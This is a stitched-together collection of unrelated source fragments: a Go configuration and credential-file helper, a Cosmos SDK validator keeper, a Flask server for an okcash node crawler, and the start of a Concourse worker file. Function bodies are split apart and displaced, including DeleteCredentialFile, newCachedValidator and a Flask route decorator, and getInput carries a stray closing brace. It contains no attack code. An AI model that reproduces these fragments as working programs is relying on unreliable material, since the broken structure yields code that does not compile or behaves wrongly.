"os"
"runtime"
"strconv"
"strings"
"github.com/awslabs/clencli/helper"
"github.com/sirupsen/logrus"
"github.com/spf13/cobra"
"github.com/spf13/viper"
"gopkg.in/yaml.v2"
)
// ConfigurationsDirectoryExist returns `true` if the configuration directory exists, `false` otherwise
func ConfigurationsDirectoryExist() bool {
return helper.DirOrFileExists(GetAppInfo().ConfigurationsDir)
}
// ConfigurationsFileExist returns `true` if the configuration file exists, `false` otherwise
func ConfigurationsFileExist() bool {
return helper.DirOrFileExists(GetAppInfo().ConfigurationsPath)
}
// CreateConfigurationsDirectory creates the configuration directory, returns `true` if the configuration directory exists, `false` otherwise
func CreateConfigurationsDirectory() (bool, string) {
dir := GetAppInfo().ConfigurationsDir
return helper.MkDirsIfNotExist(dir), dir
}
// CredentialsFileExist returns `true` if the credentials file exists, `false` otherwise
func CredentialsFileExist() bool {
return helper.DirOrFileExists(GetAppInfo().CredentialsPath)
}
// ReadConfig returns the viper instance of the given configuration `name`
func ReadConfig(name string) (*viper.Viper, error) {
v := viper.New()
app := GetAppInfo()
v.SetConfigName(name)
v.SetConfigType("yaml")
v.AddConfigPath(app.ConfigurationsDir)
err := v.ReadInConfig()
if err != nil {
return v, fmt.Errorf("unable to read configuration:%s\n%v", name, err)
}
return v, err
}
// ReadConfigAsViper returns the viper instance of the configuration at the given path, with the given name and type
func ReadConfigAsViper(configPath string, configName string, configType string) (*viper.Viper, error) {
v := viper.New()
v.AddConfigPath(configPath)
v.SetConfigName(configName)
v.SetConfigType(configType)
err := v.ReadInConfig()
if err != nil {
return v, fmt.Errorf("unable to read configuration as viper\n%v", err)
}
return v, err
}
// ReadTemplate reads the given template under clencli/*.yaml
func ReadTemplate(fileName string) (*viper.Viper, error) {
c := viper.New()
c.AddConfigPath("clencli")
c.SetConfigName(fileName)
c.SetConfigType("yaml")
c.SetConfigPermissions(os.ModePerm)
err := c.ReadInConfig() // Find and read the c file
if err != nil { // Handle errors reading the c file
return c, fmt.Errorf("Unable to read "+fileName+" via Viper"+"\n%v", err)
}
return c, nil
}
// WriteInterfaceToFile writes the given interface into a file
func WriteInterfaceToFile(in interface{}, path string) error {
b, err := yaml.Marshal(&in)
if err != nil {
_, ok := err.(*json.UnsupportedTypeError)
if ok {
return fmt.Errorf("json unsupported type error")
}
}
err = ioutil.WriteFile(path, b, os.ModePerm)
if err != nil {
return fmt.Errorf("unable to update:%s\n%v", path, err)
}
return err
}
// DeleteCredentialFile deletes the credentials file
func DeleteCredentialFile() error {
|
// DeleteConfigurationFile deletes the configurations file
func DeleteConfigurationFile() error {
return helper.DeleteFile(GetAppInfo().ConfigurationsPath)
}
// DeleteConfigurationsDirectory deletes the configurations directory
func DeleteConfigurationsDirectory() error {
return os.RemoveAll(GetAppInfo().ConfigurationsDir)
}
// GetSensitiveUserInput get sensitive input as string
func GetSensitiveUserInput(cmd *cobra.Command, text string, info string) (string, error) {
return getUserInput(cmd, text+" ["+maskString(info, 3)+"]", "")
}
func maskString(s string, showLastChars int) string {
maskSize := len(s) - showLastChars
if maskSize <= 0 {
return s
}
return strings.Repeat("*", maskSize) + s[maskSize:]
}
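// For illustration: maskString("supersecret", 3) yields "********ret", while a
// string no longer than showLastChars is returned unchanged.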
// GetSensitiveUserInputAsString get sensitive input as string
func GetSensitiveUserInputAsString(cmd *cobra.Command, text string, info string) string {
answer, err := GetSensitiveUserInput(cmd, text, info)
if err != nil {
logrus.Fatalf("unable to get user input about profile's name\n%v", err)
}
// if user typed ENTER, keep the current value
if answer != "" {
return answer
}
return info
}
func getInput() (string, error) {
reader := bufio.NewReader(os.Stdin)
text, err := reader.ReadString('\n')
if err != nil {
return "", err
}
	if runtime.GOOS == "windows" {
		// strip the trailing CRLF
		text = strings.Replace(text, "\r\n", "", -1)
	} else {
		// strip the trailing LF
		text = strings.Replace(text, "\n", "", -1)
	}
}
return text, nil
}
func getUserInput(cmd *cobra.Command, text string, info string) (string, error) {
if info == "" {
cmd.Print(text + ": ")
} else {
cmd.Print(text + " [" + info + "]: ")
}
input, err := getInput()
return input, err
}
// GetUserInputAsBool prints `text` on console and return answer as `boolean`
func GetUserInputAsBool(cmd *cobra.Command, text string, info bool) bool {
answer, err := getUserInput(cmd, text, strconv.FormatBool(info))
if err != nil {
logrus.Fatalf("unable to get user input as boolean\n%s", err)
}
if answer == "true" {
return true
} else if answer == "false" {
return false
}
return info
}
// GetUserInputAsString prints `text` on console and return answer as `string`
func GetUserInputAsString(cmd *cobra.Command, text string, info string) string {
answer, err := getUserInput(cmd, text, info)
if err != nil {
logrus.Fatalf("unable to get user input about profile's name\n%v", err)
}
// if user typed ENTER, keep the current value
if answer != "" {
return answer
}
return info
}
|
return helper.DeleteFile(GetAppInfo().CredentialsPath)
}
|
validator.go
|
package keeper
import (
"bytes"
"fmt"
"time"
sdk "github.com/cosmos/cosmos-sdk/types"
"github.com/bertux/nameservice/x/staking/types"
)
// Cache the amino decoding of validators, as it can be the case that repeated slashing calls
// cause many calls to GetValidator, which were shown to throttle the state machine in our
// simulation. Note this is quite biased though, as the simulator does more slashes than a
// live chain should, however we require the slashing to be fast as no one pays gas for it.
type cachedValidator struct {
val types.Validator
marshalled string // marshalled amino bytes for the validator object (not operator address)
}
func newCachedValidator(val types.Validator, marshalled string) cachedValidator
|
// get a single validator - this selects a particular validator #cosmospoa - based on address
func (k Keeper) GetValidator(ctx sdk.Context, addr sdk.ValAddress) (validator types.Validator, found bool) {
store := ctx.KVStore(k.storeKey)
value := store.Get(GetValidatorKey(addr))
if value == nil {
return validator, false
}
// If these amino encoded bytes are in the cache, return the cached validator
strValue := string(value)
if val, ok := k.validatorCache[strValue]; ok {
valToReturn := val.val
// Doesn't mutate the cache's value
valToReturn.OperatorAddress = addr
return valToReturn, true
}
// amino bytes weren't found in cache, so amino unmarshal and add it to the cache
validator = types.MustUnmarshalValidator(k.cdc, value)
	cachedVal := newCachedValidator(validator, strValue)
	k.validatorCache[strValue] = cachedVal
	k.validatorCacheList.PushBack(cachedVal)
	// if the cache has grown too large, evict the oldest entry (the front of the list)
	if k.validatorCacheList.Len() > aminoCacheSize {
		valToRemove := k.validatorCacheList.Remove(k.validatorCacheList.Front()).(cachedValidator)
		delete(k.validatorCache, valToRemove.marshalled)
	}
return validator, true
}
func (k Keeper) mustGetValidator(ctx sdk.Context, addr sdk.ValAddress) types.Validator {
validator, found := k.GetValidator(ctx, addr)
if !found {
panic(fmt.Sprintf("validator record not found for address: %X\n", addr))
}
return validator
}
// get a single validator by consensus address
func (k Keeper) GetValidatorByConsAddr(ctx sdk.Context, consAddr sdk.ConsAddress) (validator types.Validator, found bool) {
store := ctx.KVStore(k.storeKey)
opAddr := store.Get(GetValidatorByConsAddrKey(consAddr))
if opAddr == nil {
return validator, false
}
return k.GetValidator(ctx, opAddr)
}
func (k Keeper) mustGetValidatorByConsAddr(ctx sdk.Context, consAddr sdk.ConsAddress) types.Validator {
validator, found := k.GetValidatorByConsAddr(ctx, consAddr)
if !found {
panic(fmt.Errorf("validator with consensus-Address %s not found", consAddr))
}
return validator
}
// set the main record holding validator details
func (k Keeper) SetValidator(ctx sdk.Context, validator types.Validator) {
store := ctx.KVStore(k.storeKey)
bz := types.MustMarshalValidator(k.cdc, validator)
store.Set(GetValidatorKey(validator.OperatorAddress), bz)
}
// validator index
func (k Keeper) SetValidatorByConsAddr(ctx sdk.Context, validator types.Validator) {
store := ctx.KVStore(k.storeKey)
consAddr := sdk.ConsAddress(validator.ConsPubKey.Address())
store.Set(GetValidatorByConsAddrKey(consAddr), validator.OperatorAddress)
}
// validator index
func (k Keeper) SetValidatorByPowerIndex(ctx sdk.Context, validator types.Validator) {
// jailed validators are not kept in the power index
if validator.Jailed {
return
}
store := ctx.KVStore(k.storeKey)
store.Set(GetValidatorsByPowerIndexKey(validator), validator.OperatorAddress)
}
// validator index
func (k Keeper) DeleteValidatorByPowerIndex(ctx sdk.Context, validator types.Validator) {
store := ctx.KVStore(k.storeKey)
store.Delete(GetValidatorsByPowerIndexKey(validator))
}
// validator index
func (k Keeper) SetNewValidatorByPowerIndex(ctx sdk.Context, validator types.Validator) {
store := ctx.KVStore(k.storeKey)
store.Set(GetValidatorsByPowerIndexKey(validator), validator.OperatorAddress)
}
// replace cosmospoa
// Update the tokens of an existing validator, update the validators power index key
func (k Keeper) AddValidatorTokensAndShares(ctx sdk.Context, validator types.Validator,
tokensToAdd sdk.Int) (valOut types.Validator, addedShares sdk.Dec) {
k.DeleteValidatorByPowerIndex(ctx, validator)
pool := k.GetPool(ctx)
validator, pool, addedShares = validator.AddTokensFromDel(pool, tokensToAdd)
k.SetValidator(ctx, validator)
k.SetPool(ctx, pool)
k.SetValidatorByPowerIndex(ctx, validator)
return validator, addedShares
}
// Update the tokens of an existing validator, update the validators power index key
func (k Keeper) RemoveValidatorTokensAndShares(ctx sdk.Context, validator types.Validator,
sharesToRemove sdk.Dec) (valOut types.Validator, removedTokens sdk.Int) {
k.DeleteValidatorByPowerIndex(ctx, validator)
pool := k.GetPool(ctx)
validator, pool, removedTokens = validator.RemoveDelShares(pool, sharesToRemove)
k.SetValidator(ctx, validator)
k.SetPool(ctx, pool)
k.SetValidatorByPowerIndex(ctx, validator)
return validator, removedTokens
}
// Update the tokens of an existing validator, update the validators power index key
func (k Keeper) RemoveValidatorTokens(ctx sdk.Context,
validator types.Validator, tokensToRemove sdk.Int) types.Validator {
k.DeleteValidatorByPowerIndex(ctx, validator)
pool := k.GetPool(ctx)
validator, pool = validator.RemoveTokens(pool, tokensToRemove)
k.SetValidator(ctx, validator)
k.SetPool(ctx, pool)
k.SetValidatorByPowerIndex(ctx, validator)
return validator
}
// UpdateValidatorCommission attempts to update a validator's commission rate.
// An error is returned if the new commission rate is invalid.
func (k Keeper) UpdateValidatorCommission(ctx sdk.Context,
validator types.Validator, newRate sdk.Dec) (types.Commission, sdk.Error) {
commission := validator.Commission
blockTime := ctx.BlockHeader().Time
if err := commission.ValidateNewRate(newRate, blockTime); err != nil {
return commission, err
}
commission.Rate = newRate
commission.UpdateTime = blockTime
return commission, nil
}
// cosmospoa - remove validator func
// remove the validator record and associated indexes
// except for the bonded validator index which is only handled in ApplyAndReturnTendermintUpdates
func (k Keeper) RemoveValidator(ctx sdk.Context, address sdk.ValAddress) {
// first retrieve the old validator record
validator, found := k.GetValidator(ctx, address)
if !found {
return
}
if validator.Status != sdk.Unbonded {
panic("cannot call RemoveValidator on bonded or unbonding validators")
}
if validator.Tokens.IsPositive() {
panic("attempting to remove a validator which still contains tokens")
}
if validator.Tokens.GT(sdk.ZeroInt()) {
panic("validator being removed should never have positive tokens")
}
// delete the old validator record
store := ctx.KVStore(k.storeKey)
store.Delete(GetValidatorKey(address))
store.Delete(GetValidatorByConsAddrKey(sdk.ConsAddress(validator.ConsPubKey.Address())))
store.Delete(GetValidatorsByPowerIndexKey(validator))
// call hooks
k.AfterValidatorRemoved(ctx, validator.ConsAddress(), validator.OperatorAddress)
}
// get groups of validators
// get the set of all validators with no limits, used during genesis dump
func (k Keeper) GetAllValidators(ctx sdk.Context) (validators []types.Validator) {
store := ctx.KVStore(k.storeKey)
iterator := sdk.KVStorePrefixIterator(store, ValidatorsKey)
defer iterator.Close()
for ; iterator.Valid(); iterator.Next() {
validator := types.MustUnmarshalValidator(k.cdc, iterator.Value())
validators = append(validators, validator)
}
return validators
}
// return a given amount of all the validators
func (k Keeper) GetValidators(ctx sdk.Context, maxRetrieve uint16) (validators []types.Validator) {
store := ctx.KVStore(k.storeKey)
validators = make([]types.Validator, maxRetrieve)
iterator := sdk.KVStorePrefixIterator(store, ValidatorsKey)
defer iterator.Close()
i := 0
for ; iterator.Valid() && i < int(maxRetrieve); iterator.Next() {
validator := types.MustUnmarshalValidator(k.cdc, iterator.Value())
validators[i] = validator
i++
}
return validators[:i] // trim if the array length < maxRetrieve
}
// get the current group of bonded validators sorted by power-rank
func (k Keeper) GetBondedValidatorsByPower(ctx sdk.Context) []types.Validator {
store := ctx.KVStore(k.storeKey)
maxValidators := k.MaxValidators(ctx)
validators := make([]types.Validator, maxValidators)
iterator := sdk.KVStoreReversePrefixIterator(store, ValidatorsByPowerIndexKey)
defer iterator.Close()
i := 0
for ; iterator.Valid() && i < int(maxValidators); iterator.Next() {
address := iterator.Value()
validator := k.mustGetValidator(ctx, address)
if validator.Status == sdk.Bonded {
validators[i] = validator
i++
}
}
return validators[:i] // trim
}
// returns an iterator for the current validator power store
func (k Keeper) ValidatorsPowerStoreIterator(ctx sdk.Context) (iterator sdk.Iterator) {
store := ctx.KVStore(k.storeKey)
iterator = sdk.KVStoreReversePrefixIterator(store, ValidatorsByPowerIndexKey)
return iterator
}
//_______________________________________________________________________
// Last Validator Index
// Load the last validator power.
// Returns zero if the operator was not a validator last block.
func (k Keeper) GetLastValidatorPower(ctx sdk.Context, operator sdk.ValAddress) (power int64) {
store := ctx.KVStore(k.storeKey)
bz := store.Get(GetLastValidatorPowerKey(operator))
if bz == nil {
return 0
}
k.cdc.MustUnmarshalBinaryLengthPrefixed(bz, &power)
return
}
// Set the last validator power.
func (k Keeper) SetLastValidatorPower(ctx sdk.Context, operator sdk.ValAddress, power int64) {
store := ctx.KVStore(k.storeKey)
bz := k.cdc.MustMarshalBinaryLengthPrefixed(power)
store.Set(GetLastValidatorPowerKey(operator), bz)
}
// Delete the last validator power.
func (k Keeper) DeleteLastValidatorPower(ctx sdk.Context, operator sdk.ValAddress) {
store := ctx.KVStore(k.storeKey)
store.Delete(GetLastValidatorPowerKey(operator))
}
// returns an iterator for the consensus validators in the last block
func (k Keeper) LastValidatorsIterator(ctx sdk.Context) (iterator sdk.Iterator) {
store := ctx.KVStore(k.storeKey)
iterator = sdk.KVStorePrefixIterator(store, LastValidatorPowerKey)
return iterator
}
// Iterate over last validator powers.
func (k Keeper) IterateLastValidatorPowers(ctx sdk.Context, handler func(operator sdk.ValAddress, power int64) (stop bool)) {
store := ctx.KVStore(k.storeKey)
iter := sdk.KVStorePrefixIterator(store, LastValidatorPowerKey)
defer iter.Close()
for ; iter.Valid(); iter.Next() {
addr := sdk.ValAddress(iter.Key()[len(LastValidatorPowerKey):])
var power int64
k.cdc.MustUnmarshalBinaryLengthPrefixed(iter.Value(), &power)
if handler(addr, power) {
break
}
}
}
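// Illustrative use of IterateLastValidatorPowers (hypothetical caller): sum the
// power of all validators from the last block.
//
//	var total int64
//	k.IterateLastValidatorPowers(ctx, func(_ sdk.ValAddress, power int64) bool {
//		total += power
//		return false // keep iterating
//	})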
// get the group of the bonded validators
func (k Keeper) GetLastValidators(ctx sdk.Context) (validators []types.Validator) {
store := ctx.KVStore(k.storeKey)
// add the actual validator power sorted store
maxValidators := k.MaxValidators(ctx)
validators = make([]types.Validator, maxValidators)
iterator := sdk.KVStorePrefixIterator(store, LastValidatorPowerKey)
defer iterator.Close()
i := 0
for ; iterator.Valid(); iterator.Next() {
// sanity check
if i >= int(maxValidators) {
panic("more validators than maxValidators found")
}
address := AddressFromLastValidatorPowerKey(iterator.Key())
validator := k.mustGetValidator(ctx, address)
validators[i] = validator
i++
}
return validators[:i] // trim
}
//_______________________________________________________________________
// Validator Queue
// gets a specific validator queue timeslice. A timeslice is a slice of ValAddresses corresponding to unbonding validators
// that expire at a certain time.
func (k Keeper) GetValidatorQueueTimeSlice(ctx sdk.Context, timestamp time.Time) (valAddrs []sdk.ValAddress) {
store := ctx.KVStore(k.storeKey)
bz := store.Get(GetValidatorQueueTimeKey(timestamp))
if bz == nil {
return []sdk.ValAddress{}
}
k.cdc.MustUnmarshalBinaryLengthPrefixed(bz, &valAddrs)
return valAddrs
}
// Sets a specific validator queue timeslice.
func (k Keeper) SetValidatorQueueTimeSlice(ctx sdk.Context, timestamp time.Time, keys []sdk.ValAddress) {
store := ctx.KVStore(k.storeKey)
bz := k.cdc.MustMarshalBinaryLengthPrefixed(keys)
store.Set(GetValidatorQueueTimeKey(timestamp), bz)
}
// Deletes a specific validator queue timeslice.
func (k Keeper) DeleteValidatorQueueTimeSlice(ctx sdk.Context, timestamp time.Time) {
store := ctx.KVStore(k.storeKey)
store.Delete(GetValidatorQueueTimeKey(timestamp))
}
// Insert an validator address to the appropriate timeslice in the validator queue
func (k Keeper) InsertValidatorQueue(ctx sdk.Context, val types.Validator) {
timeSlice := k.GetValidatorQueueTimeSlice(ctx, val.UnbondingCompletionTime)
var keys []sdk.ValAddress
if len(timeSlice) == 0 {
keys = []sdk.ValAddress{val.OperatorAddress}
} else {
keys = append(timeSlice, val.OperatorAddress)
}
k.SetValidatorQueueTimeSlice(ctx, val.UnbondingCompletionTime, keys)
}
// Delete a validator address from the validator queue
func (k Keeper) DeleteValidatorQueue(ctx sdk.Context, val types.Validator) {
timeSlice := k.GetValidatorQueueTimeSlice(ctx, val.UnbondingCompletionTime)
newTimeSlice := []sdk.ValAddress{}
for _, addr := range timeSlice {
if !bytes.Equal(addr, val.OperatorAddress) {
newTimeSlice = append(newTimeSlice, addr)
}
}
if len(newTimeSlice) == 0 {
k.DeleteValidatorQueueTimeSlice(ctx, val.UnbondingCompletionTime)
} else {
k.SetValidatorQueueTimeSlice(ctx, val.UnbondingCompletionTime, newTimeSlice)
}
}
// Returns all the validator queue timeslices from time 0 until endTime
func (k Keeper) ValidatorQueueIterator(ctx sdk.Context, endTime time.Time) sdk.Iterator {
store := ctx.KVStore(k.storeKey)
return store.Iterator(ValidatorQueueKey,
sdk.InclusiveEndBytes(GetValidatorQueueTimeKey(endTime)))
}
// Returns a concatenated list of all the timeslices before currTime, and deletes the timeslices from the queue
func (k Keeper) GetAllMatureValidatorQueue(ctx sdk.Context, currTime time.Time) (matureValsAddrs []sdk.ValAddress) {
// gets an iterator for all timeslices from time 0 until the current Blockheader time
validatorTimesliceIterator := k.ValidatorQueueIterator(ctx, ctx.BlockHeader().Time)
for ; validatorTimesliceIterator.Valid(); validatorTimesliceIterator.Next() {
timeslice := []sdk.ValAddress{}
		k.cdc.MustUnmarshalBinaryLengthPrefixed(validatorTimesliceIterator.Value(), &timeslice)
matureValsAddrs = append(matureValsAddrs, timeslice...)
}
return matureValsAddrs
}
// Unbonds all the unbonding validators that have finished their unbonding period
func (k Keeper) UnbondAllMatureValidatorQueue(ctx sdk.Context) {
store := ctx.KVStore(k.storeKey)
validatorTimesliceIterator := k.ValidatorQueueIterator(ctx, ctx.BlockHeader().Time)
for ; validatorTimesliceIterator.Valid(); validatorTimesliceIterator.Next() {
timeslice := []sdk.ValAddress{}
		k.cdc.MustUnmarshalBinaryLengthPrefixed(validatorTimesliceIterator.Value(), &timeslice)
for _, valAddr := range timeslice {
val, found := k.GetValidator(ctx, valAddr)
if !found {
panic("validator in the unbonding queue was not found")
}
if val.GetStatus() != sdk.Unbonding {
panic("unexpected validator in unbonding queue, status was not unbonding")
}
k.unbondingToUnbonded(ctx, val)
if val.GetDelegatorShares().IsZero() {
k.RemoveValidator(ctx, val.OperatorAddress)
}
}
store.Delete(validatorTimesliceIterator.Key())
}
}
|
{
return cachedValidator{
val: val,
marshalled: marshalled,
}
}
|
app.py
|
"""
Open Nodes web server
Copyright (c) 2018 Opennodes / Blake Bjorn Anderson
Permission is hereby granted, free of charge, to any person obtaining
a copy of this software and associated documentation files (the
"Software"), to deal in the Software without restriction, including
without limitation the rights to use, copy, modify, merge, publish,
distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to
the following conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
import gzip
import json
import os
import sys
from io import BytesIO
from flask import Flask, render_template, request, redirect, flash, Response
from flask_sqlalchemy import SQLAlchemy
from geoip2.errors import AddressNotFoundError
from sqlalchemy import and_
from config import load_config, DefaultFlaskConfig
from crawler import init_geoip, connect
from models import *
import pandas as pd
from autodoc import Autodoc
app = Flask(__name__)
auto = Autodoc(app)
app.config.from_object(DefaultFlaskConfig())
app.config.from_object('flask_config')
db = SQLAlchemy(app)
CONF = load_config()
COUNTRY, CITY, ASN = init_geoip()
@app.route('/')
@app.route('/networks/<network_name>', methods=['GET'])
def network_dashboard(network_name=None):
    if network_name not in ("okcash", "testnet", None):
flash("Invalid network")
return redirect("/")
with open("static/network_summaries.json", 'r') as f:
summaries = json.load(f)
if network_name:
age_min = summaries[network_name]['age_min']
age_max = summaries[network_name]['age_max']
else:
age_min = min((summaries[network]['age_min'] for network in CONF['networks']))
age_max = max((summaries[network]['age_max'] for network in CONF['networks']))
    return render_template("network_dashboard.html",
                           network=network_name,
                           include_client=False,
                           include_user_agent=network_name is not None,
                           include_network=network_name is None,
                           include_version=network_name is not None,
                           include_active=bool(CONF['export_inactive_nodes']),
                           age_min=age_min * 1000.0,
                           age_max=age_max * 1000.0)
def gzip_response(input_str, pre_compressed):
response = Response()
if not pre_compressed:
buffer = BytesIO()
gzip_file = gzip.GzipFile(mode='wb', fileobj=buffer)
gzip_file.write(input_str if isinstance(input_str, bytes) else input_str.encode())
gzip_file.close()
response.data = buffer.getvalue()
else:
response.data = input_str
response.headers['Content-Encoding'] = 'gzip'
response.headers['Vary'] = 'Accept-Encoding'
response.headers['Content-Length'] = len(response.data)
return response
@app.route('/api/get_networks', methods=['POST'])
@auto.doc()
def get_networks():
"""
Returns a list of all available network names
:return: JSON string, ex. "['okcash','testnet']"
"""
return json.dumps([x[0] for x in db.session.query(Node.network).distinct().all()])
@app.route('/api/gzip_file/<filename>', methods=['GET'])
@auto.doc()
def gzip_static_file(filename):
"""
Returns a crawl result as a gzipped response
:param filename: file_network.ext - file is 'data' or 'history', ext is either .json, .csv, .txt (data.ext returns data for all crawled networks)
:return: gzip encoded html response
"""
valid_files = ["custom.geo.json"]
for coin in ("", "_groestlcoin", "_testnet"):
for suff in ("", "_unique"):
for ext in (".csv", ".json", ".txt"):
valid_files.append("data" + coin + suff + ext)
valid_files.append("history" + coin + '.json')
if filename not in valid_files:
return redirect("/", code=404)
with open(os.path.join("static", filename), "r") as f:
return gzip_response(f.read(), False)
def deconstruct_address_string(inp):
assert isinstance(inp, str)
resp = {}
aliases = {'ok': 'okcash',
'tok': 'testnet'}
inp = inp.lower()
network = inp.split(":")[0]
if network:
inp = ":".join(inp.split(":")[1:])
network = aliases[network] if network in aliases else network
network = network if network in CONF['networks'] else None
if not network:
network = "okcash"
resp['warning'] = "Network not recognized, using OK"
if ":" in inp:
port = inp.split(":")[-1]
try:
port = int(port)
inp = ":".join(inp.split(":")[:-1])
except ValueError:
resp['warning'] = "port not recognized, using default"
port = int(CONF['networks'][network]['port'])
else:
port = int(CONF['networks'][network]['port'])
return network, inp, port, resp
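# Illustrative behaviour (given the aliases above and the configured ports):
#   deconstruct_address_string("ok:127.0.0.1:6970")  -> ("okcash", "127.0.0.1", 6970, {})
#   deconstruct_address_string("foo:127.0.0.1")      -> ("okcash", "127.0.0.1", <default port>,
#       {"warning": "Network not recognized, using OK"})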
@app.route('/api/check_node', methods=['POST'])
@auto.doc()
def check_node():
"""
Checks the current status of a node. This is a live result, so response times will be longer - to view a saved
result see /api/check_historic_node.
:param node: connection string, e.g. ok:127.0.0.1:6970 - port is optional if it is the network default
:param to_services (integer, optional): outgoing services to broadcast, default=0
:param from_services (integer, optional): outgoing services to broadcast, default=0
:param version (integer, optional): version code to broadcast, default varies by network
:param user_agent (string, optional): user agent to broadcast, default="/oknodes:0.1/"
:param height (integer, optional): block height to broadcast during handshake. default=network median
:param p2p_nodes (bool, optional): issues a getaddr call and list of connected nodes, default=False
:return: json dict {"result":{"user_agent":"/oktoshi:5.0.0.2/", "version":" .... }, "nodes":[["127.0.0.1:6970, 157532132191], ...]}
"""
dat = request.form
node = dat.get("node")
network, address, port, resp = deconstruct_address_string(node)
network_data = CONF['networks'][network]
if dat.get("height"):
network_data['height'] = dat.get("height")
else:
with open("static/network_summaries.json", 'r') as f:
network_data['height'] = int(json.load(f)[network]['med'])
network_data['protocol_version'] = dat.get("version") or network_data['protocol_version']
result = connect(network, address, port,
to_services=dat.get("to_services") or network_data['services'],
network_data=network_data,
user_agent=dat.get("user_agent") or None,
p2p_nodes=False,
explicit_p2p=dat.get("p2p_nodes") or False,
from_services=dat.get('from_services') or None,
keepalive=False)
resp['result'] = result[0]
resp['nodes'] = result[1]
resp['result'] = geocode(resp['result'])
return to_json(resp)
|
@auto.doc()
def check_historic_node():
"""
    Checks the status of a node based on the most recent crawl - this is a stored
    result; for a live check see /api/check_node.
:param node: connection string, e.g. ok:127.0.0.1:6970 - port is optional if it is the network default
:return: json dict {"result":{"user_agent":"/oktoshi:5.0.0.2/", "version":" .... }}
"""
if request.method == "POST":
dat = request.form
else:
dat = request.args
node = dat.get("node")
network, address, port, resp = deconstruct_address_string(node)
if network not in CONF['networks']:
return json.dumps({'error': "network not recognized"})
result = db.session.query(Node).get((network, address, port))
resp['result'] = "None" if result is None else result.to_dict()
return to_json(resp)
@app.route("/about")
def about():
return render_template("about.html")
@app.route("/api_docs")
def api_docs():
return auto.html()
@app.route('/api/get_nodes', methods=['POST'])
@auto.doc()
def get_node_list():
"""
Gets a list of all nodes visible during the past 30 days
:param network (optional): Filters the result set based on the given network
:return: json array [{"address":"127.0.0.1" ... }, {"address":"0.0.0.0", "port:6970}]
"""
q = db.session.query(Node.network, Node.address, Node.port, Node.user_agent, Node.version, Node.first_seen,
Node.last_seen, Node.last_checked, Node.country, Node.city, Node.asn, Node.aso).filter(
Node.seen)
if request.args.get("network") is not None:
network = request.args.get("network")
if network not in CONF['networks']:
return {"error": "network must be one of " + ", ".join(CONF['networks'])}
q = q.filter(Node.network == network)
return pd.read_sql(q.statement, q.session.bind).to_json(orient='records')
@app.route('/api/node_history', methods=['POST'])
@auto.doc()
def get_node_history():
"""
Returns the data associated with a node, and all crawler visitations on record
:param node: connection string, e.g. ok:127.0.0.1:6970 - port is optional if it is the network default.
:return: json dict {"node":{"user_agent":"/oktoshi/", "last_seen": ... }, "history":{"timestamp":157032190321,"height":56000, "success":1 ...}}
"""
node = request.form.get("node")
network, address, port, resp = deconstruct_address_string(node)
if network not in CONF['networks']:
return json.dumps({'error': "network not recognized"})
default_port = int(CONF['networks'][network]['port'])
resp = {}
try:
port = int(port) if port is not None else default_port
except ValueError:
resp['warning'] = "port not recognized, using default"
port = default_port
n = db.session.query(Node.network, Node.address, Node.port, Node.user_agent, Node.version, Node.first_seen,
Node.last_seen, Node.last_checked, Node.country, Node.city, Node.asn, Node.aso) \
.filter(and_(Node.network == network, Node.address == address, Node.port == port)).one()
q = db.session.query(NodeVisitation.timestamp, NodeVisitation.height, NodeVisitation.success) \
.join(Node, and_(Node.network == NodeVisitation.network, Node.address == NodeVisitation.address,
Node.port == NodeVisitation.port)) \
.filter(and_(Node.network == network, Node.address == address, Node.port == port)) \
.order_by(NodeVisitation.timestamp.desc())
df = pd.read_sql(q.statement, q.session.bind)
df['timestamp'] = df['timestamp'].astype(pd.np.int64) // 10 ** 9
resp.update({"node": {"network": n.network, 'address': n.address, "port": n.port, "user_agent": n.user_agent,
"version": n.version,
"first_seen": n.first_seen,
"last_seen": n.last_seen,
"last_checked": n.last_checked,
"country": n.country, "city": n.city, "asn": n.asn, "aso": n.aso},
"history": df.to_dict(orient='records')})
return to_json(resp)
def geocode(result):
if result and result['address'].endswith('.onion'):
aso, asn, country, city = "Anonymous", "Anonymous", "Anonymous", "Anonymous"
elif result:
try:
aso = ASN.asn(result['address']).autonomous_system_organization
asn = ASN.asn(result['address']).autonomous_system_number
except AddressNotFoundError:
aso = None
asn = None
try:
country = COUNTRY.country(result['address']).country.name
except AddressNotFoundError:
country = None
try:
city = CITY.city(result['address']).city.name
except AddressNotFoundError:
city = None
else:
return result
result['aso'] = aso
result['asn'] = asn
result['country'] = country
result['city'] = city
return result
def clean_dates(d):
for i in d:
if isinstance(d[i], datetime.datetime):
d[i] = d[i].timestamp()
if isinstance(d[i], dict):
d[i] = clean_dates(d[i])
return d
def to_json(d):
"""
Sanitizes a dictionary - converts datetime.datetime instances to timestamps
:param d: dictionary
:return: json string
"""
d = clean_dates(d)
return json.dumps(d)
def main():
app.run("0.0.0.0", debug=False if "--prod" in sys.argv else True, port=8888 if "--prod" in sys.argv else 5000)
# app.run("0.0.0.0", debug=False if "--prod" in sys.argv else True, port=443 if "--prod" in sys.argv else 5000, ssl_context=('/etc/letsencrypt/live/nodes.okcash.org/fullchain.pem', '/etc/letsencrypt/live/nodes.okcash.org/privkey.pem'))
if __name__ == '__main__':
main()
|
@app.route('/api/check_historic_node', methods=['POST', 'GET'])
|
worker.go
|
package main
import (
"fmt"
"os"
"path/filepath"
"code.cloudfoundry.org/lager"
"github.com/concourse/baggageclaim/baggageclaimcmd"
"github.com/concourse/concourse"
concourseWorker "github.com/concourse/concourse/worker"
"github.com/concourse/concourse/worker/beacon"
workerConfig "github.com/concourse/concourse/worker/start"
"github.com/concourse/concourse/worker/sweeper"
"github.com/concourse/concourse/worker/tsa"
"github.com/concourse/flag"
"github.com/tedsuo/ifrit"
"github.com/tedsuo/ifrit/grouper"
"github.com/tedsuo/ifrit/sigmon"
)
type WorkerCommand struct {
Worker workerConfig.Config
